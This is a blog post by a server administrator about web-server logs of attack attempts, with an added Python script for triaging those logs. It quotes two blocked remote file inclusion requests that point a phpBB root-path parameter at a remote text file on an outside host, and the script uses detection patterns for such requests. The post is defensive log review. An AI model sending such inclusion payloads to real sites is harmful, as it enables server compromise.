When Script Kiddies Attack

Wahh... classes have started again (even though I rarely go to class 😀). Hmm, this server was left alone for about a week while I went home, and hahaha, there are so many logs... tons of them!!!! Hahaha, it's really my own stupidity, I forgot to set up a crontab to rotate all those piles of logs. Yesterday I looked at the web server log (the mod security log) and, oh man, crazy, there was so much of it!!!!! It made my head spin reading it...

From what I can see in the logs, on average an attack happens once every 15 minutes, ranging from spam to RFI and LFI... hmm... Here's a bit of the log (RFI):

==953aa80c==============================
Request: xxxxx.xxxxxx.x.x 72.149.42.126 - - [24/Oct/2007:23:30:33 +0700] "GET /web/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 500 1353 "-" "libwww-perl/5.65" - "-"
----------------------------------------
GET /web/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: xxxxx.xxxx.xxxxx
User-Agent: libwww-perl/5.65
mod_security-message: Access denied with code 500. Pattern match "phpbb_root_path" at THE_REQUEST
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
Last-Modified: Tue, 19 Jun 2007 03:22:03 GMT
ETag: "8576a-549-d1366cc0;628b3780"
Accept-Ranges: bytes
Content-Length: 1353
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
--953aa80c--

==7b81d714==============================
Request: xxxxx.xxxxx.x.x 72.149.42.126 - - [24/Oct/2007:23:30:34 +0700] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 500 1353 "-" "libwww-perl/5.65" - "-"
----------------------------------------
GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: xxxx.xxxxx.x.x
User-Agent: libwww-perl/5.65
mod_security-message: Access denied with code 500. Pattern match "phpbb_root_path" at THE_REQUEST
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
Last-Modified: Tue, 19 Jun 2007 03:22:03 GMT
ETag: "8576a-549-d1366cc0;62e80900"
Accept-Ranges: bytes
Content-Length: 1353
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
--7b81d714--

(xxxxx.xxxxx.x.x is deliberately masked)

That's only a small part of the log... if I dumped all of it here, whoever reads it would drop dead -______________-.

But what's rather annoying is the rule for blocking spam. Wow, crazy, there are so many log entries from spam; some get blocked, some still keep slipping right in -______________-.

Turns out securing a web application is harder than securing other things -______-
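For triage of a large audit log like the one quoted above, here is an added example (not part of the original post) that parses entries in that layout, counts RFI-shaped requests per source, lists the ones no rule blocked, and computes the average gap between entries. The sample entries, the `inc` parameter and all function names are constructed for illustration, and it assumes the audit log also records requests that were not denied.

```python
import re
from collections import Counter
from datetime import datetime
from urllib.parse import urlsplit, parse_qsl

# Constructed sample (reserved example IPs/hosts), same layout as the entries above.
SAMPLE = '''\
==aaaa0001==============================
Request: www.example.org 192.0.2.10 - - [24/Oct/2007:23:30:33 +0700] "GET /web/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://files.example.net/safe.txt? HTTP/1.1" 500 1353 "-" "libwww-perl/5.65" - "-"
----------------------------------------
mod_security-message: Access denied with code 500. Pattern match "phpbb_root_path" at THE_REQUEST
mod_security-action: 500
--aaaa0001--
==aaaa0002==============================
Request: www.example.org 192.0.2.10 - - [24/Oct/2007:23:45:33 +0700] "GET /index.php?inc=http://files.example.net/safe.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.65" - "-"
----------------------------------------
--aaaa0002--
'''

ENTRY = re.compile(r'^==(\w+)=+\n(.*?)^--\1--$', re.S | re.M)
REQUEST = re.compile(r'^Request: \S+ (\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)', re.M)
ACTION = re.compile(r'^mod_security-action: (\d+)', re.M)
REMOTE_URL = re.compile(r'(?i)^(https?|ftp)://')

def parse_entries(text):
    # One dict per ==id== ... --id-- entry; entries without a Request line are skipped.
    for m in ENTRY.finditer(text):
        req = REQUEST.search(m.group(2))
        if not req:
            continue
        ip, ts, target = req.groups()
        params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
        yield {
            "ip": ip,
            "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            # RFI indicator: a query parameter whose value is itself a remote URL
            "rfi_params": [k for k, v in params if REMOTE_URL.match(v)],
            "blocked": ACTION.search(m.group(2)) is not None,
        }

def summarize(entries):
    entries = sorted(entries, key=lambda e: e["time"])
    rfi = [e for e in entries if e["rfi_params"]]
    gaps = [(b["time"] - a["time"]).total_seconds() for a, b in zip(entries, entries[1:])]
    return {
        "rfi_by_ip": Counter(e["ip"] for e in rfi),
        "rfi_not_blocked": [(e["ip"], e["rfi_params"]) for e in rfi if not e["blocked"]],
        "mean_gap_minutes": sum(gaps) / len(gaps) / 60 if gaps else None,
    }
```

The `rfi_not_blocked` list is the part worth reviewing first: it shows requests with a URL-valued parameter that a rule keyed on one parameter name, like the `phpbb_root_path` match in the log above, did not cover.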
